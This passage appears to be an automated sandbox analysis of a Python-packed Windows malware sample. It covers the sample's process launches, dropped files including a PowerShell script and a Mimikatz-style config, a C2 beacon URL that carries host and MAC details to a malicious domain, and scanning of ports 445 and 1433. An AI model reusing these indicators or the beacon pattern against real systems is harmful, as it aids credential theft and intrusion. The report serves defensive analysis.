c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qagent.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll

PID
3548
CMD
ipconfig /all
Path
C:\Windows\system32\ipconfig.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
IP Configuration Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ipconfig.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qagent.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll

PID
2232
CMD
netstat -na
Path
C:\Windows\system32\netstat.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
TCP/IP Netstat Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\netstat.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\inetmib1.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll

Registry activity

Total events
320
Read events
265
Write events
55
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
2584
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US

Files activity

Executable files
28
Suspicious files
2
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._ARC4.pyd
executable
MD5: 8d85dbf6c981bff4e8a1bea86a0ac5e9
SHA256: 356623219b8c098435d511c0055c061018641d8b700eb089fc6ff87d233260e1
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\bz2.pyd
executable
MD5: 0b1688c02640ec14d85e1cc3c93f7276
SHA256: 753ea279675eeb34fe58908f10cb15886955c865b49c01b533a5930e6b326038
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32api.pyd
executable
MD5: 4808fc8e377c68afc58e512eaeb92984
SHA256: 63112adebc44d8183faa148e53cc48ddda0a9fb11c7d15a1ef5c8b36023f1205
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Hash._SHA256.pyd
executable
MD5: 977aa3580a3d9cd373407967086c88b8
SHA256: 5c651f53138499b2dd436e1a432dac3f0eed4ba1426685a0f4edcfed05349c90
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32pipe.pyd
executable
MD5: 0d4a1785aa8f949cfa2a19278cbe3c81
SHA256: 2efc1764b23e02b2e91016ea331e68207cb5c2579166ca305a196fe343719d4d
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_hashlib.pyd
executable
MD5: 22071845daf8c1f6e87f006673eed4fd
SHA256: 51c47389782bc2de8e401d231233e2e7f1a4b3afce7df4ddf4ad533184dad407
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\python27.dll
executable
MD5: f5c5c0d5d9e93d6e8cb66b825cd06230
SHA256: e3eed66221a6552d4b9ae7350b3dc30de238a6029efae060514d2780c02fedb4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_mssql.pyd
executable
MD5: e0aa19ec9424664a61a8413cdf346a67
SHA256: d5253b4c05f1f82b066f4d59294dc3f531a74161161a1857d6bbb44d61639608
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32event.pyd
executable
MD5: 997b91ab18b0e50a458b6093a77c1f51
SHA256: 3f2d34661fd5cc1c800c121ad8ed1077ad62888a688fea23dcf2617aceed2d7c
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Random.OSRNG.winrandom.pyd
executable
MD5: 731a6b82b8475e383dac97b20aeab7f7
SHA256: d710b5a398dd0dc128129f3b035d459d6860b5c45ccc8ee2066069202b9d1f30
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Hash._MD4.pyd
executable
MD5: f98765af6763cfe9ece7136f14f88397
SHA256: d722ed0ee7fef1f30860f83b3fecfa089955ca0d6b522a379efdc34f0401e321
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._DES.pyd
executable
MD5: 4b7b86b41280dfd1e1d29a7f626393ef
SHA256: 8b0f41fd5a3d78e7c4990b1df3414c4fa221624444f318bb0a29f92f02b1a15e
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_multiprocessing.pyd
executable
MD5: cc3b15be403249398c53d3e7d720893f
SHA256: 6a6b8cb5cad9769a07af9a50bab5b3c848b411f66d7723c7e4c65d9e7dbe08ed
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._DES3.pyd
executable
MD5: f6d78ab78381bf4056335a75ee7c8523
SHA256: 5317f80ae3b32d6a3d4ce013bdf93f5d857e6625bc89c778171983e95865abe4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\pyexpat.pyd
executable
MD5: 136a3d873192913c40a1270352a97787
SHA256: a8561293134f940ff1c95b2be82b24a80c22b851e8594008b567a2842a60e9ab
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_socket.pyd
executable
MD5: b7c3e334648a6cbb03b550b842818409
SHA256: f0781a1b879584f494d984e31869eab13f0535825f68862e6597b1639df708bd
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_ssl.pyd
executable
MD5: 27a7a40b2b83578e0c3bffb5a167d67a
SHA256: ea0efcab32e6572f61a3c765356e283bd6a8f75ec2a4c8b12f1fb3db76ca68d4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Util.strxor.pyd
executable
MD5: 32dce0579bd19ff24bd4a1accf5afc73
SHA256: 2170b576f5f22d06e700e5570dc234fa5f77c7fe4af8394f0dac49566f9a8b40
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\msvcr90.dll
executable
MD5: cdbe9690cf2b8409facad94fac9479c9
SHA256: 8e7fe1a1f3550c479ffd86a77bc9d10686d47f8727025bb891d8f4f0259354c8
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_ctypes.pyd
executable
MD5: 98638a1bfdecdcecf4d7d47b521ac903
SHA256: 11c739d28227773d70c3941d2e979b9d4cee12f1d53cc94daf77b62a4d3a0327
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32wnet.pyd
executable
MD5: ba30a2a5208405c1d8eece685a9a3adf
SHA256: 2611a0c3ac7a2c10316c6532570345ea697d03e74c56e3eb0fea322b48fc7072
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Util._counter.pyd
executable
MD5: 556bd0c831364879e75e873da82dccf8
SHA256: a3c7473617025de594f45ea4eb0b943f6e406935017d746de2c310698e3c689d
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\select.pyd
executable
MD5: dcee0dbcf84cc9f1620f168d8f8f9fd1
SHA256: 385e7a3cf5dd7b65590b064e7bc09f901db7ddc8542396af6bb60048a30993f0
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\msvcp90.dll
executable
MD5: 4c39358ebdd2ffcd9132a30e1ec31e16
SHA256: 06918cf99ad26cd6cf106881c0d5bdb212dc0bac4549805c9f5906e3d03d152c
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._AES.pyd
executable
MD5: 9fd78d7d6ab69af5a14e0f29affd7ef4
SHA256: 87c920ed2c1afcf295729563b4def671dc9e36ef8b3e183d4836571300180e74
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\msvcm90.dll
executable
MD5: d34a527493f39af4491b3e909dc697ca
SHA256: 7a74da389fbd10a710c294c2e914dc6f18e05f028f07958a2fa53ac44f0e4b90
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\pywintypes27.dll
executable
MD5: f3ef005e60f838eaaa44529daeeb93ab
SHA256: 241ecbd87410e9b23339d494f9eca7ddf8083472661989f489fdd7fe0b8776b4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\unicodedata.pyd
executable
MD5: 5b44d0bd38c218445dde8c913736eaac
SHA256: edec30653dc56df03eb40fa97c616950fd593c0b90c2950af722e66816eb70e9
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\ii.exe.manifest
xml
MD5: 08458035409af6baef39d93956f86e74
SHA256: 82517610333e631b6df2d74e19f217d87824b0dfd39f9cdddecb416f1ee66808
2584
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Microsoft.VC90.CRT.manifest
xml
MD5: bfb93876892cca8e2ad0021585c34c8b
SHA256: 0d060ed7c25159b7b75f16d449963bfd639c15b3c5280bc7897403268c2b9f35
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Include\pyconfig.h
text
MD5: 557582e29f77226734bf9e750785bd96
SHA256: 24822847bba1ee7af1a0f02b95d36d6515c5ac37ecb180a89d9d7628fc7675fd
4068
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\m2.ps1
text
MD5: 7ac4e48cd81b8595aade2ff6423494e2
SHA256: 3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41
2584
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2M6PSQDG5SHRVNUEYUAL.temp
––
MD5:  ––
SHA256:  ––
2584
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF212b74.TMP
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
4068
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\mkatz.ini
text
MD5: 600a07e256becbaa2ace6a615976d9cd
SHA256: db6fb038370748a91d947afb7cbb3fd696355a19ba6f1844c144b3a1dd1c88cf

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
5
Threats
6

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
4068 6_URL_ii.exe GET 200 79.98.145.42:80 http://ip.42.pl/raw PL
text
suspicious
4068 6_URL_ii.exe GET 301 45.79.77.20:80 http://jsonip.com/ US
html
suspicious
4068 6_URL_ii.exe GET 200 153.92.4.49:80 http://info.abbny.com/e.png?id=User-PC&mac=52-54-00-4A-04-AF,00-01-00-01-21-68&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-14,09:27:52&c=1&VER=7&d=0&from=&mpass=&size=6966576&num=0&sa= US
text
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
4068 6_URL_ii.exe 79.98.145.42:80 Nitronet Sp. z o.o. PL suspicious
4068 6_URL_ii.exe 45.79.77.20:80 Linode, LLC US suspicious
4068 6_URL_ii.exe 153.92.4.49:80 US suspicious
4068 6_URL_ii.exe 45.79.77.20:443 Linode, LLC US suspicious
4068 6_URL_ii.exe 192.168.1.2:445 –– shared
4068 6_URL_ii.exe 192.168.1.2:1433 –– shared

DNS requests

Domain IP Reputation
info.ackng.com No response unknown
ip.42.pl 79.98.145.42
suspicious
info.beahh.com No response unknown
jsonip.com 45.79.77.20
suspicious
info.abbny.com 153.92.4.49
malicious

Threats

PID Process Class Message
4068 6_URL_ii.exe Attempted Information Leak ET POLICY Python-urllib/ Suspicious User Agent
4068 6_URL_ii.exe Attempted Information Leak ET POLICY Python-urllib/ Suspicious User Agent
4068 6_URL_ii.exe Attempted Information Leak ET POLICY Python-urllib/ Suspicious User Agent
4068 6_URL_ii.exe Misc activity ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
4068 6_URL_ii.exe Misc activity ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection

1 ETPRO signatures available at the full report

Debug output strings

No debug info.